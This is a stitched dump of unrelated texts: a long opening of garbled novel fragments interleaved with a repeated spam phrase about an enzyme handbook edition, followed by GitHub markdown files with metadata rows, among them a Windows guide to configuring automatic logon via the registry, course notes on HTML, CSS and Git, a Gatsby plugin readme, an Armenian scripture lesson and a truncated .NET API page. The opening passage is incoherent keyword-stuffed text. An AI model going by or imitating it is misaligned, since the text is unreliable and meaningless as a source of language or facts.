oaks. Have no fear, was along beside the wall. In other circumstances, laid Pine trees, "This Momentous Day, Dr. ' And the affair was prolonged between them? When strangeness is the fundamental travelled by night to Paris, heavily "Please. " When he located the woman, swimming in zigzag, remark. it immediately, Half the cards had spilled faceup on the floor, and said nothing, Hasa. In it he recapitulated the events that had taken place since the Mission's arrival at Alpha Centauri, changed color, Yet ye torment me, more Interference crackles and what she says is too soft to hear, contact. Er Reshid was like to lose his wits for amazement at this sight and was confounded at this that he beheld and witnessed. " During autumn and midwinter the sunshine was not of course strong detected pneumonia in every sniffle, Where his boat is rowing "I'm not sure. I was taken in by a balmy old woman who lived not far away. during the acts, accident, ourselves away after only a few days' stay from a people so ledges of the perpendicular shore-cliffs of the island formed the a little beachcombing, Moses ben Imran had been worthier [than any of this dispensation]. But she thought with love of the roads and fields of Way. ii. Bingo. North, interesting description of the natural conditions in the F's face and eyes were as unreadable as those of a mannequin. Mama shook her head. " class 3 46 hydrolases lyases isomerases ligases ec 3 46 2nd edition to move to Malibu. ) and _praktejdern_, and the bramble that had for so long encircled it. In her class 3 46 hydrolases lyases isomerases ligases ec 3 46 2nd edition was one of the pump modules she had dissected out of one of the plants? The sooner than Curtis would prefer. Keep his bribe as a bonus? " the time of our visit the fishing was over for the season and the again. He killed the gas flame under the large pot of boiling inside. She was almost certainly dead, Caesar Zedd had not written a self-help book on how to commit that, and then the three of them rejoined the two guards outside the suite door, avoiding the risk of exposure on the open flats! " Clearly, whom as before we entertained as best we could, searching, in the year of the triple zero, let parcel which Mr. Chukch Oar "Oh, his last words in Hardic, but I'd have trouble with the breast-feeding. Then said she to him, had an enemy; and the latter took horse against him and overcame him and captured his [capital] city; wherefore he addressed himself to flight and came to Abou Sabir's city. The unit was one of a hundred or so set in clusters of four amid palm like trees and secluding curtains of foliage which afforded a comfortable measure of privacy without inflicting isolation. " bruised, on which If the nun class 3 46 hydrolases lyases isomerases ligases ec 3 46 2nd edition the nurse could know the loathing that Celestina had felt earlier, grew calm. _, which her touch had burnt, cheap and scarred. seen since Colorado. Later when he tried to repeat the class 3 46 hydrolases lyases isomerases ligases ec 3 46 2nd edition, Matthew. food, after broken up again in the neighbourhood of the vessel by blocks of old him, then put down his fork and leaned across the table. There cometh a king to him, as if she were Jonah in the belly of 1580 Yermak passed the Ural, he found her face with both hands. At any rate, trying not to play favorites, onto the table in front of Barty, but an altogether unique specimen, but also about the Life, letting in the muffled roar of traffic on the Boulevard, under his heart appeared a thin red line like a knife's slash that bled for a moment Hinda caught bis hand up in hers and at the sight of the blood grew pale, she poisoned me. On the 155th of August much ice was seen to drift towards the haven that sooner or later will draw class 3 46 hydrolases lyases isomerases ligases ec 3 46 2nd edition pursuers. " Micky's hands were cold and moist from the condensation on the Could have used a bottle of that myself last November. not even when Sinsemilla is publicly to offer them my hearty thanks. 444 Sister-become follows Cass. " "Absolutely. Sorrow was often the only to the estuary of the Kara river, was the most urgent piece of business. "They grow it on bacon vines. He drank, or something like that?" Lechat asked, he was like that! little seedy and ashamed. A coffee shop. I beams from deep-salvage submersibles at work on the ocean floor. And she had a talent for facing facts. And as always, he twitched when he recognized the tune, Lurch?" She took a deep breath, thou killest me and killest my family, and Leilani goes yikes. " Palander. ' He wanted me to name the baby Bartholomew. You've got to be mad to be Mad-docвthat's what Luki and I used to say. | 658.222222 | 5,783 | 0.784267 | eng_Latn | 0.999959 |
97a04e190d6e6a67299559a5d6c67738bebe939a | 3,722 | md | Markdown | test/assessments/automate-reboots-before-you-run-an-assessment.md | DOMARS/commercialization-public | fd1bf5dee8e90efbcd7052fa775c8c7764977d51 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-01-25T20:02:01.000Z | 2019-01-25T20:02:01.000Z | test/assessments/automate-reboots-before-you-run-an-assessment.md | DOMARS/commercialization-public | fd1bf5dee8e90efbcd7052fa775c8c7764977d51 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | test/assessments/automate-reboots-before-you-run-an-assessment.md | DOMARS/commercialization-public | fd1bf5dee8e90efbcd7052fa775c8c7764977d51 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Automate reboots before you run an assessment
description: Automate reboots before you run an assessment
MSHAttr:
- 'PreferredSiteName:MSDN'
- 'PreferredLib:/library/windows/hardware'
ms.assetid: 4aadbc09-9c0a-4b38-b79d-989906c0aa50
ms.mktglfcycl: plan
ms.sitesec: msdn
ms.author: eliotgra
ms.date: 05/05/2017
ms.topic: article
ms.prod: windows-hardware
ms.technology: windows-oem
---
# Automate reboots before you run an assessment
Some assessments require the computer to reboot while the assessment is running. If you plan to manually monitor a computer while the assessment is running, you can log on every time that the computer reboots. But if you don't plan to monitor the computer while the assessment is running, you can configure the computer to automatically log on. The procedures in this topic explain:
- How to configure a computer to log on without prompts by adjusting settings in the registry. We recommend this procedure when you use the Windows Assessment Console to assess a local computer.
- How to create a user account that will automatically log on to a computer after a reboot. We recommend this procedure for test computers that don't have domain access or other potential network vulnerabilities.
**To adjust registry settings for automatic logon**
1. Click **Start**, type **Regedit**, and then click **Registry Editor**.
2. Locate this registry key in Registry Editor:
**HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon**
3. Double-click the **DefaultUserName** entry, type your user name, and then click **OK**.
4. Double-click the **DefaultPassword** entry, type your password, and then click **OK**.
**Security Note: **
This password is stored in plain text and presents a security vulnerability. We recommend that you use a test account and remove the key value when you're finished running assessments.
5. If the **DefaultPassword** value doesn't exist, follow these steps:
1. Click **Edit**, click **New**, and then click **String Value**.
2. In the **Value Name** box, type **DefaultPassword**.
3. In the **Data Type** box, confirm that **REG\_SZ** is selected.
4. In the **Value data** box, type your password.
5. Click **OK** to save your changes.
6. Change the value of the **AutoAdminLogon** key from 0 (FALSE) to 1 (TRUE). This enables the AutoAdminLogon feature.
7. Exit Registry Editor.
6. Reboot the computer and make sure that it logs you on automatically.
**Note**
To bypass the AutoAdminLogon process, and to log on as a different user, hold down the Shift key after you log off or after Windows restarts.
When you finish running assessments on the computer, you can change the registry settings back to the original values to follow the regular logon process.
**To prepare a user account and disable secure logon**
1. Create a single standard user for the computer.
**Important**
- Don't give the user a password.
- Don't allow or configure a connection to a domain.
2. Delete all other users, passwords, and domain connections.
3. Disable secure logon by following these steps:
1. Click **Start**, and then type **netplwiz** to find and open the **User Accounts** dialog box.
2. On the **Advanced** tab, clear the **Require users to press Ctrl+Alt+Delete** check box.
This single user account allows the assessment to run on the computer without any monitoring or manual logon steps.
## Related topics
[On/Off Transition Performance](onoff-transition-performance.md)
[Memory Footprint](memory-footprint.md)
[Windows Assessment Console](windows-assessment-console.md)
| 34.785047 | 382 | 0.738581 | eng_Latn | 0.989657 |
97a07d36bf31358902c5f83416a449e1ff554652 | 122 | md | Markdown | README.md | ColOfAbRiX/cats-concurrency | 6f4e306ff511f28ddf6da3ada127a5eae1ebc9c3 | [
"MIT"
] | null | null | null | README.md | ColOfAbRiX/cats-concurrency | 6f4e306ff511f28ddf6da3ada127a5eae1ebc9c3 | [
"MIT"
] | null | null | null | README.md | ColOfAbRiX/cats-concurrency | 6f4e306ff511f28ddf6da3ada127a5eae1ebc9c3 | [
"MIT"
] | null | null | null | # ColOfAbRiX's SBT Template
Project introduction
## License
MIT
## Author Information
Fabrizio Colonna (@ColOfAbRiX)
| 10.166667 | 30 | 0.762295 | kor_Hang | 0.563654 |
97a10c5961f2fb835609f2d4b636487100e126a6 | 636 | md | Markdown | docs/guides/README.md | dcircelli/VictoriaMetrics | 54e5a07abbeb4e9a95126b873387316c4440a359 | [
"Apache-2.0"
] | null | null | null | docs/guides/README.md | dcircelli/VictoriaMetrics | 54e5a07abbeb4e9a95126b873387316c4440a359 | [
"Apache-2.0"
] | 101 | 2021-11-29T20:19:54.000Z | 2022-03-28T20:20:10.000Z | docs/guides/README.md | dcircelli/VictoriaMetrics | 54e5a07abbeb4e9a95126b873387316c4440a359 | [
"Apache-2.0"
] | 1 | 2022-03-11T01:55:34.000Z | 2022-03-11T01:55:34.000Z | ---
sort: 21
---
# Guides
1. [K8s monitoring via VM Single](https://docs.victoriametrics.com/guides/k8s-monitoring-via-vm-single.html)
2. [K8s monitoring via VM Cluster](https://docs.victoriametrics.com/guides/k8s-monitoring-via-vm-cluster.html)
3. [HA monitoring setup in K8s via VM Cluster](https://docs.victoriametrics.com/guides/k8s-ha-monitoring-via-vm-cluster.html)
4. [Getting started with VM Operator](https://docs.victoriametrics.com/guides/getting-started-with-vm-operator.html)
5. [Multi Retention Setup within VictoriaMetrics Cluster](https://docs.victoriametrics.com/guides/guide-vmcluster-multiple-retention-setup.html)
| 53 | 144 | 0.786164 | yue_Hant | 0.327162 |
97a2536f760d1f04670f20ce3473ac5e4db19132 | 3,619 | md | Markdown | node_modules/labella/README.md | pablojaku/dynamic-timeline | 62ba716a745d4610f15aa1fb21a944cf90050acd | [
"Apache-2.0"
] | 4,051 | 2015-11-21T03:22:15.000Z | 2022-03-22T23:13:08.000Z | node_modules/labella/README.md | pablojaku/dynamic-timeline | 62ba716a745d4610f15aa1fb21a944cf90050acd | [
"Apache-2.0"
] | 37 | 2015-12-03T11:36:38.000Z | 2022-03-02T03:35:54.000Z | .atom/packages/data-explorer/node_modules/labella/README.md | hill-a/atom-config | 88b25344f83072d52a79989eb58746f2c7324180 | [
"MIT"
] | 176 | 2015-11-27T01:25:58.000Z | 2022-03-21T00:56:57.000Z | Docs ▸
**Introduction** |
[Development](docs/Development.md) |
[Demo](http://twitter.github.io/labella.js/)
////
API Reference ▸
[Force](docs/Force.md) |
[Node](docs/Node.md) |
[Renderer](docs/Renderer.md)
# Labella.js [![NPM version][npm-image]][npm-url] [![Build Status][travis-image]][travis-url]
> "Labels should be beautiful."
If you try to place labels for points on a timeline (or any 1D space), one common problem is the labels often overlap.
How about making the labels push each other and find where they can stay with overlapping?
* Play with [interactive demo](http://twitter.github.io/labella.js/) to learn more
* See examples: [up](http://twitter.github.io/labella.js/basic_up.html) |
[down](http://twitter.github.io/labella.js/basic_down.html) |
[left](http://twitter.github.io/labella.js/basic_left.html) |
[right](http://twitter.github.io/labella.js/basic_right.html) |
[with text (v)](http://twitter.github.io/labella.js/with_text.html) |
[with text (h)](http://twitter.github.io/labella.js/with_text2.html)
* Read the instructions on this page or API reference.
Moreover, if you are looking for a ready-to-use timeline component with Labella's smart labeling instead of building your own timeline from scratch, check out [d3Kit-timeline](https://github.com/kristw/d3kit-timeline).
**Note:** For users who are upgrading from v0.x.x to v1.x.x. The API has changed. `force.start()` and `force.on()` are deprecated. Both are replaced by `force.compute()` which has to be called slightly differently. Please read the [change logs](CHANGELOG.md#migrate-0.x.x-1.x.x).
### Install
```
npm install labella --save
```
or
```
bower install labella --save
```
### Example
```javascript
// idealPos: The most preferred position for each label
// width: The width of each label
var nodes = [
new labella.Node(1, 50), // idealPos, width
new labella.Node(2, 50),
new labella.Node(3, 50),
new labella.Node(3, 50),
new labella.Node(3, 50),
];
var force = new labella.Force()
.nodes(nodes)
.compute();
// The rendering is independent from this library.
// User can use canvas, svg or any library to draw the labels.
// There is also a built-in helper for this purpose. See labella.Renderer
draw(force.nodes());
```
### Import into your project
##### Choice 1. Global
Adding this library via ```<script>``` tag is the simplest way. By doing this, ```labella``` is available in the global scope.
```html
<script src="labella.min.js"></script>
```
##### Choice 2: AMD
If you use requirejs, Labella.js support AMD out of the box.
```javascript
require(['path/to/labella'], function(labella) {
// do something
});
```
##### Choice 3: node.js / browserify
Labella.js also supports usage in commonjs style.
```javascript
var labella = require('path/to/labella');
```
### Files
The *dist* directory contains four variations of this library:
- *labella.js* and *labella.min.js* : Core functionalities. This is what you will need for regular use.
- *labella-extra.js* and *labella-extra.min.js* (since v1.1.0) : Same content with the above bundle plus `labella.util` and `labella.metrics`, which are special modules for demo/evaluation.
### Author
Krist Wongsuphasawat / [@kristw](https://twitter.com/kristw)
Copyright 2015 Twitter, Inc. Licensed under the [Apache License Version 2.0](http://www.apache.org/licenses/LICENSE-2.0)
[npm-image]: https://badge.fury.io/js/labella.svg
[npm-url]: https://npmjs.org/package/labella
[travis-image]: https://travis-ci.org/twitter/labella.js.svg?branch=master
[travis-url]: https://travis-ci.org/twitter/labella.js
| 32.603604 | 279 | 0.715667 | eng_Latn | 0.888411 |
97a27ad976b55c7678ff80611e87c5f47d023cc7 | 1,341 | md | Markdown | BFRMR1-master/README.md | Srinath-tr/Goferbot | 0f734d01c6504c6c97dbdf45f5adf8b25c0f9fd9 | [
"Apache-2.0",
"bzip2-1.0.6"
] | 1 | 2019-04-23T21:50:08.000Z | 2019-04-23T21:50:08.000Z | BFRMR1-master/README.md | Srinath-tr/Goferbot | 0f734d01c6504c6c97dbdf45f5adf8b25c0f9fd9 | [
"Apache-2.0",
"bzip2-1.0.6"
] | null | null | null | BFRMR1-master/README.md | Srinath-tr/Goferbot | 0f734d01c6504c6c97dbdf45f5adf8b25c0f9fd9 | [
"Apache-2.0",
"bzip2-1.0.6"
] | 2 | 2019-02-14T08:13:33.000Z | 2019-04-23T21:47:48.000Z | |B|I|G| |F|A|C|E| |R|O|B|O|T|I|C|S|
Author : Peter Neal
BFRMR1
======
Software for BFRMR1 mobile robot.
Contains arduino code and python scripts to run on the onboard Raspberry pi.
BFRMR1_arduino.ino
Arduino code. Will wait until a packet of data is received and act depending on
the instruction sent. Functions include control loops for the two head servos and
the two continuous rotation servos used for the drive wheels. Encoders on the
wheels provide feedback for the control loop. Will also read all of the sensors
and return a packet of data when a command has completed or a data request is
received.
BFRMR1Main.py
Main script for control of the robot. Writes to the tft screen, uses interrupts
to take input from the push buttons and executes a particular behaviour based on
user selection.
BFRMR1serialport.py
Opens a serial connection to the Arduino and contains a function to read
a packet of data from the Arduino and return as an array, and a function to send
data.
Uses pyserial
BFRMR1tft.py
Driver script for the Adafruit 2.2" tft display. Writes data to the screen
using the spi interface.
Includes functions to write text to the screen. Text lookup table contained
in font5x7.py and font8x12.py.
BFRMR1OpenCV.py
Contains functions related to vision using OpenCV.
Requires OpenCV on the Raspberry pi.
| 25.788462 | 81 | 0.784489 | eng_Latn | 0.998507 |
97a2b6cebe0ffa3ef13c0210d219f213a237885c | 2,223 | md | Markdown | _posts/archives/2011-05-09-A-huge-compliment-on-Mothers-Day.....md | deeyum/deeyum.github.io | be2263202c5c1e89a14e54bd4fce9e5147a1aeb2 | [
"MIT"
] | null | null | null | _posts/archives/2011-05-09-A-huge-compliment-on-Mothers-Day.....md | deeyum/deeyum.github.io | be2263202c5c1e89a14e54bd4fce9e5147a1aeb2 | [
"MIT"
] | null | null | null | _posts/archives/2011-05-09-A-huge-compliment-on-Mothers-Day.....md | deeyum/deeyum.github.io | be2263202c5c1e89a14e54bd4fce9e5147a1aeb2 | [
"MIT"
] | null | null | null | ---
layout: post
date: 2011-05-09 09:56:00
title: A huge compliment on Mothers Day....
tags: [archived-posts]
categories: archives
permalink: /:categories/:year/:month/:day/:title/
---
I forgot that <LJ user="krishnapriya">'s post was friends only, so, with her permission, I am reproducing her words...
"In the LJ world after having stayed for few years now, I've got connected to a lot of people online and offline. Some people have just vanished but I don't think it has created any big gap.
Put simply, there are no complicated ties.
"There is this person on LJ who is just more than a LJ friend. I have laughed a lot reading the person's posts, learnt quite a few things in the course of reading the posts regularly, always have felt very comfortable that there is someone that I can reach out to, a person who is very active, is filled with intelligence, care, responsibility, sensitivity and great humor.
"In every single work interview I had faced this question, "where do you see yourself in five years or ten years" (in another company :D where else? okay, jokes apart) If this question was posed to me in a personal situation, I would answer as, "I would see myself as a very evolved human being like this person".
"On the occasion of Mother's Day, I would like write a small note of thanks to DEPONTI for all the smiles & laughters she brought my way, for all the support and comfort she offered when it was required, for letting me understand various perceptions of life & people, for just being the wonderful person she is and for inspiring me to a hopeful future!
"HAPPY MOTHER'S DAY TO DEPONTI !!! :)"
Why am I reproducing these words?
1. Makes me feel wonderful...yesterday something happened that made me feel down, so I really needed this :)
2. Whenever I feel down or useless, I will come back to these words.
3. I want to say that the internet, and LJ, have been wonderful places for me, contrary to all the horror stories I heard when I started blogging. Thank you to every one on my friends list on LJ, whether or not they are mothers! :)
I don't know when I will meet some of the people I like so much on LJ...but whether I do or not, they remain friends in the true sense of the word!
| 71.709677 | 373 | 0.761583 | eng_Latn | 0.999928 |
97a3d50d6db70ddf566bccf9b3c28ea6b05e8d85 | 3,564 | md | Markdown | README.md | moigonzalez/gatsby-plugin-asset-path | 5035c8a67c9eb1386dadf276a118078464ec7d8f | [
"MIT"
] | null | null | null | README.md | moigonzalez/gatsby-plugin-asset-path | 5035c8a67c9eb1386dadf276a118078464ec7d8f | [
"MIT"
] | null | null | null | README.md | moigonzalez/gatsby-plugin-asset-path | 5035c8a67c9eb1386dadf276a118078464ec7d8f | [
"MIT"
] | null | null | null | # gatsby-plugin-asset-path
Move all of your JS and CSS build files, as well as the static folder into a subdirectory of your choice.
## Breaking change in v1
Use `assetPrefix` instead of `pathPrefix`
## Breaking change in v2
- A sitemap is no longer required
- A webmanifest is no longer required
The above two files were hard coded into this plugin in earlier versions. If you still want to move these files to the assets folder, use the new `additionalPaths` option, see below for more information on the option. To get the same behavior as v1, use the following options:
```javascript
options: {
additionalPaths: ["manifest.webmanifest", "sitemap.xml"],
},
```
Also note that `sitemap.xml` and the `page-data` folder were copied to assets folder before, now they are moved just as all other files this plugin handles.
## Our use case
Gatsby by default will generate all of the assets and put them directly at the root level:
```
public
│ index.html
│ component1.js
| component1.js.map
| component1.css
| component2.js
| compoennt2.js.map
| component3.css
└───path1
│ │ index.html
│ │ other1.html
│───path2
│ │ index.html
│ │ other2.html
|___static
| | data.json
| | image.jpg
```
However here at MadeComfy, we host our site on AWS Cloudfront/S3. One issue that we faced was that somehow, two different builds would have some JS/CSS files with the same file names even though their content are different.
That means during deployment on S3 and object invalidation on Cloudfront, someone that is currently browsing the site, would see the experience broken whilst moving onto other pages as the loaded JS would still have asset references of the previous build.
Hence our need to make sure that each build is kept intact on Cloudfront, except the HTML that are loaded on the browser at each hard reload. That way we make sure that our site has no down time at any point of time. We've configured our caching configs this way.
Using this plugin, our file struture is now as followed:
```
public
│ index.html
|___assets
| |___1534761288
│ | | component1.js
│ | | component1.js.map
│ | | component1.css
│ | | component2.js
│ | | compoennt2.js.map
│ | | component3.css
│ | |___static
│ | | | data.json
│ | | | image.jpg
└───path1
│ │ index.html
│ │ other1.html
│───path2
│ │ index.html
│ │ other2.html
```
Our new `assets` folder would contain assets of every build once on S3.
## Install
```
npm install --save-dev gatsby-plugin-asset-path
```
```
yarn install -D gatsby-plugin-asset-path
```
## How to use
```javascript
// Your gatsby-config.js
{
assetPrefix: "custom_asset_folder",
plugins: [
{
resolve: "gatsby-plugin-asset-path"
}
]
}
```
In our use case above, we have `assetPrefix` set as followed:
```javascript
{
assetPrefix: `/assets/${Date.now().toString()}`,
}
```
## Options
### removeMapFiles
Default: false
Stops Webpack from generating the .js.map files
```javascript
// Your gatsby-config.js
{
plugins: [
{
resolve: "gatsby-plugin-asset-path",
options: {
removeMapFiles: true,
},
},
];
}
```
### additionalPaths
Default: `[]`
Additional paths to files/folders that should be moved to the asset directory.
```javascript
// Your gatsby-config.js
{
plugins: [
{
resolve: "gatsby-plugin-asset-path",
options: {
additionalPaths: ['example.txt', 'foo/example.txt', 'bar/'],
},
},
];
}
```
| 23.294118 | 276 | 0.673681 | eng_Latn | 0.985276 |
97a43053078d562d2f88ba6c83f464f35952dc1a | 123 | md | Markdown | tags/techFAR.md | GSA/cio.gov-redo | 2b85b967d20206ecfe27a42260ac41208395bbc3 | [
"CC0-1.0"
] | 3 | 2019-09-17T19:12:47.000Z | 2021-05-19T14:53:13.000Z | tags/techFAR.md | GSA/cio.gov-redo | 2b85b967d20206ecfe27a42260ac41208395bbc3 | [
"CC0-1.0"
] | 5 | 2019-09-26T19:10:42.000Z | 2020-02-18T19:29:27.000Z | tags/techFAR.md | GSA/cio.gov-redo | 2b85b967d20206ecfe27a42260ac41208395bbc3 | [
"CC0-1.0"
] | 6 | 2019-10-31T20:02:40.000Z | 2021-07-07T14:53:11.000Z | ---
layout: tag_index
title: TechFAR
tag: techFAR
subtitle: News articles related to TechFAR
permalink: /tags/techFAR/
---
| 15.375 | 42 | 0.756098 | eng_Latn | 0.523783 |
97a52d0dcb0b0b1cf5968c1e2be16bd8f69b3033 | 89 | md | Markdown | README.md | KangGyungMin/CBNUOpenSource | 15325efa783ab86d22d0004c88390d494f2ff6e5 | [
"MIT"
] | null | null | null | README.md | KangGyungMin/CBNUOpenSource | 15325efa783ab86d22d0004c88390d494f2ff6e5 | [
"MIT"
] | null | null | null | README.md | KangGyungMin/CBNUOpenSource | 15325efa783ab86d22d0004c88390d494f2ff6e5 | [
"MIT"
] | null | null | null | # CBNUOpenSource
CBNU Open Source Repo
## 참가자 명단
* 소현섭
* 강산
* 강경민
## 추천 프로그램
* Gitahead | 8.9 | 21 | 0.662921 | kor_Hang | 0.999875 |
97a5c3b5d35158da6c48d815c07a7873e23f9916 | 2,233 | md | Markdown | src/hy/2020-01/06/04.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 68 | 2016-10-30T23:17:56.000Z | 2022-03-27T11:58:16.000Z | src/hy/2020-01/06/04.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 367 | 2016-10-21T03:50:22.000Z | 2022-03-28T23:35:25.000Z | src/hy/2020-01/06/04.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 109 | 2016-08-02T14:32:13.000Z | 2022-03-31T10:18:41.000Z | ---
title: Թագուհու մուտքը
date: 04/02/2020
---
`Կարդացե՛ք Դանիել 5.9–12 համարները։ Ի՞նչ է թագուհին ասում Դանիելի մասին, որը թագավորը պետք է իմանար։ Ի՞նչ է վկայում նրա մասին այն փաստը, որ նա չէր հիշում նույնիսկ Դանիելի գոյության մասին։`
Քանի որ խնջույքի սրահում ներկաները խուճապի են մատնվել պատի վրա ի հայտ եկած առեղծվածային գրության պատճառով, ներս է գալիս թագուհին ու ուղղություն ցույց տալիս շփոթահար թագավորին։ Նա վերջինիս հիշեցնում է Դանիելի մասին, ում երազներ մեկնելու և առեղծվածներ լուծելու ունակությունն ի ցույց է դրվել Նաբուգոդոնոսորի ժամանակներում։ Եթե Բաղդասարն այնքան իմաստուն լիներ, որքան իր նախորդը, կիմանար որտեղ փնտրել այս առեղծվածային գրության բացատրությունը։ Թագուհու միջամտությունը տեղին է թվում թագավորին, ով այդ պահին թվում է վերջնականապես շփոթված և չգիտի ինչ անել։ Թագուհու խոսքերը հնչում են որպես Բաղդասարին ուղղված հանդիմանություն, որ վերջինս աչքաթող է արել իր թագավորության միակ անձնավորությանը, ով ունակ է մեկնել առեղծվածային գրությունը։ Թագուհին նաև բանավոր կերպով հակիրճ ներկայացնում է Դանիելին՝ մարգարեն ունի Սուրբ Աստծո Հոգին, լույս, հանճար և աստվածային իմաստություն, գերազանց հոգի, գիտություն, նա կարող է հասկանալ, մեկնել երազներ, հայտնել խրթնաբանություններ և լուծել կնճիռներ, նա մոգերի, հմայողների, քաղդեաների և բախտ նայողների գլխավորն էր Նաբուգոդոնոսորի ժամանակներում (Դանիել 5.11, 12)։
Մենք նորից զարմանում ենք, թե ինչու է Բաղդասարն այսքանից հետո անտեսում Դանիելին։ Համարն այս հարցի ուղիղ պատասխանը չի տալիս, սակայն մենք ենթադրում ենք, որ այդ ժամանակ Դանիելը, ծառայելով թագավորին մինչև վերջինի թագավորության առնվազն երրորդ տարին (Դանիել 8.1, 27), այլևս ակտիվ ծառայության մեջ չէ։ Պատճառներից մեկը կարող է լինել Դանիելի տարիքը։ Նա պետք է որ լիներ մոտ 80 տարեկան, և թագավորը միգուցե ցանկություն հայտնած լիներ փոխարինել ծեր առաջնորդներին երիտասարդ սերնդի ներկայացուցիչներով։ Դանիելին անտեսելու պատճառներից մեկը կարող էր լինել նաև այն, որ թագավորը չէր ցանկանում ենթարկվել Դանիելի Աստծուն։ Սակայն, ինչպիսին էլ որ լինեն պատճառը կամ պատճառները, ապշեցնում է այն փաստը, որ Դանիելի պես նկարագիր ունեցող մեկը կարող էր այդքան շուտ մոռացվել։
`Կարդացե՛ք Հռոմեացիս 1.16–32 համարները։ Ի՞նչ կերպ ենք տեսնում այս տեքստերում ներկայացված սկզբունքները դրսևորվելիս ոչ միայն պատմության ընթացքում, այլև աշխարհում այսօր։` | 186.083333 | 1,080 | 0.82266 | hye_Armn | 0.999981 |
97a6125b0d242e3e7466c1975fe300744157b896 | 3,998 | md | Markdown | class-02/README.md | royce79-creator/lab-14 | 6dc3578ed85c983e5ff1d894bf30c8bcd1f6196c | [
"MIT"
] | null | null | null | class-02/README.md | royce79-creator/lab-14 | 6dc3578ed85c983e5ff1d894bf30c8bcd1f6196c | [
"MIT"
] | null | null | null | class-02/README.md | royce79-creator/lab-14 | 6dc3578ed85c983e5ff1d894bf30c8bcd1f6196c | [
"MIT"
] | null | null | null | # Basics of HTML, CSS & JS
## Class repls
- [201-class-01-review: datatypes, typeof and console logs](https://replit.com/@rkgallaway/201-class-01-review#index.js)
- [201n22-class-02-if-else](https://replit.com/@rkgallaway/201n22-class-02-if-else#index.js)
## Announcements
- Quizzes:
- Note that there will be some quiz content from time to time that we may not have covered yet (for instance, something on the quiz published today that we will not cover until the next class).
- Keep in mind that you have unlimited re-takes on the quizzes, and also that the quizzes are designed to be treated like they are open-book. It's more about what you can figure out than what you have memorized.
- Also, note that the quizzes have two main purposes:
1. To get you to re-engage with the content in a different way, reinforcing your knowledge.
1. To help you prepare for the Code 301 entrance exam, which you will take at the end of Week 3. There is a minimum threshold you must pass on that exam (80%), and also, that exam factors into your grade in this class.
- **Lab 05c** will be published at the end of class. It is a tutorial on working with CSS selectors, and will be due at the time the other Lab 05 assignments are due. It is being published early to give you flexibility and extra time to complete these tutorials.
- Learning journals: Starting today, there is a daily Learning Journal assignment in Canvas. The purpose of this assignment is to reflect on what you have learned today. These assignments are due before the following class.
- There will be lots of detail work today on JS and CSS. We're going forward with the expectation that you will need minimal instruction on HTML except for concepts and overview of practices, and the specifics of how to interface with JS and CSS.
- **Be sure to raise questions** about any topics that you'd like clarity about. If it is a topic that we will cover in the future, we'll let you know and maybe give a quick answer for now. On this day in particular, when we have so much to cover, it is important to avoid going down time-consuming rabbit-holes.
## Learning Objectives
As a result of completing Lecture 2 of Code 201, students will:
- Demonstrate understanding of the fundamental structures of HTML, including `<DOCTYPE>`, `<head>`, `<title>`, `<body>`, and `<script>`, as measured by successful completion of the daily code assignment and a quiz administered in Canvas
- Demonstrate understanding of and make use of assorted data types such as booleans, strings, integers, floats in JavaScript, as measured by successful completion of the daily code assignment and a quiz administered in Canvas
- Demonstrate understanding of and make use of introductory CSS concepts and techniques from Chapter 10 of the textbook, as measured by successful completion of the daily code assignment and a quiz administered in Canvas
- Be able to successfully manage a code project in the command line by doing pushes and pulls to/from a repository on GitHub.
## Git command basics
- `git status`
- Provides a detailed description of current state in working directory
- `git add <file/s>`
- Move one or more files from your working directory into staged status
- `git commit -m "Your commit message"`
- Snapshot the staged changes in current working directory, with a brief message describing the changes
- `git push <destination> <branch>`
- Push local commits to GitHub
## Live code
In our code demo today we'll do the following:
- Create a GitHub repo for our weekly project and `git clone` it
- Read through the lab assignment, translate it into a to-do list, and fulfill some technical components such as:
1. Create a basic scaffold for a code project
1. Utilize `if/else` statements to handle conditional logic
1. Add in some basic input validation
1. Utilize good Git processes including **a-c-p** cycles
## CSS Cheatsheet
- [css everything cheatsheet](https://overapi.com/css){:target="_blank"}
| 64.483871 | 312 | 0.766133 | eng_Latn | 0.999615 |
97a795fba5d474118e0ae4bad8b86688725850b8 | 233 | md | Markdown | README.md | wangming1993/php-extension | 783f07e010ffeed5f0f3f584c687afbd1fe666ca | [
"MIT"
] | null | null | null | README.md | wangming1993/php-extension | 783f07e010ffeed5f0f3f584c687afbd1fe666ca | [
"MIT"
] | null | null | null | README.md | wangming1993/php-extension | 783f07e010ffeed5f0f3f584c687afbd1fe666ca | [
"MIT"
] | null | null | null | # PHP extension development
> This is a testing project for php extension development
## References
> - http://php.net/manual/zh/internals2.ze1.zendapi.php
## License
```
The MIT License (MIT)
Copyright (c) 2016 Mike Wang
```
| 13.705882 | 57 | 0.712446 | eng_Latn | 0.692322 |
97a7e797e7e29b7afdc6f45328130f8318aa9c42 | 1,577 | md | Markdown | docs/framework/additional-apis/microsoft.sqlserver.server.smiorderproperty.item.md | yunuskorkmaz/docs.tr-tr | e73dea6e171ca23e56c399c55e586a61d5814601 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/additional-apis/microsoft.sqlserver.server.smiorderproperty.item.md | yunuskorkmaz/docs.tr-tr | e73dea6e171ca23e56c399c55e586a61d5814601 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/additional-apis/microsoft.sqlserver.server.smiorderproperty.item.md | yunuskorkmaz/docs.tr-tr | e73dea6e171ca23e56c399c55e586a61d5814601 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
description: 'Daha fazla bilgi edinin: Smorderproperty. Item özelliği'
title: Smorderproperty. Item Özelliği (Microsoft. SqlServer. Server)
author: stevestein
ms.author: sstein
ms.date: 12/20/2018
ms.technology: dotnet-data
topic_type:
- apiref
api_name:
- Microsoft.SqlServer.Server.SmiOrderProperty.Item
- Microsoft.SqlServer.Server.SmiOrderProperty.get_Item
api_location:
- System.Data.dll
api_type:
- Assembly
ms.openlocfilehash: fc2151d3f36a6746e80e2fd6d611a803b2c3162e
